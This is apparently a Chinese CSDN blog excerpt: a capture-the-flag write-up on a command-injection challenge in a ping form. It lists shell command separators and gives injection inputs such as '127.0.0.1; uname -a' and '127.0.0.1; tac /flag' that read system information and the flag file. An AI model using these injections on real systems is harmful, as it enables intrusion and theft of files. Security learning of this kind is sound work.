常用命令分隔符
python
; # 顺序执行多条命令
| # 管道符,将前命令输出作为后命令输入
|| # 前命令失败则执行后命令
& # 后台执行
&& # 前命令成功则执行后命令
$(cmd) # 命令替换
`cmd` # 命令替换(反引号)
实际利用步骤
(1)探测系统信息:127.0.0.1; uname -a
(2)列出目录文件:127.0.0.1; ls /
(3)读取flag文件:127.0.0.1; tac /flag
漏洞特征分析
1。技术实现推测:
根据返回结果的特征和题目的名称,推测后端可能使用了PHP的exec()或system()等命令执行函数
这些函数能够直接调用系统shell执行命令
2.漏洞类型判断:
基于"用户输入直接拼接系统命令"的典型模式
结合题目提示和初步实验结果
初步判定存在命令注入漏洞(Command Injection)
3.验证方向:
需要进一步测试是否存在命令分隔符注入可能
验证是否能够执行非PING相关系统命令
版权声明:本文为CSDN博主「一只枷锁」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/2402_84408069/article/details/149840438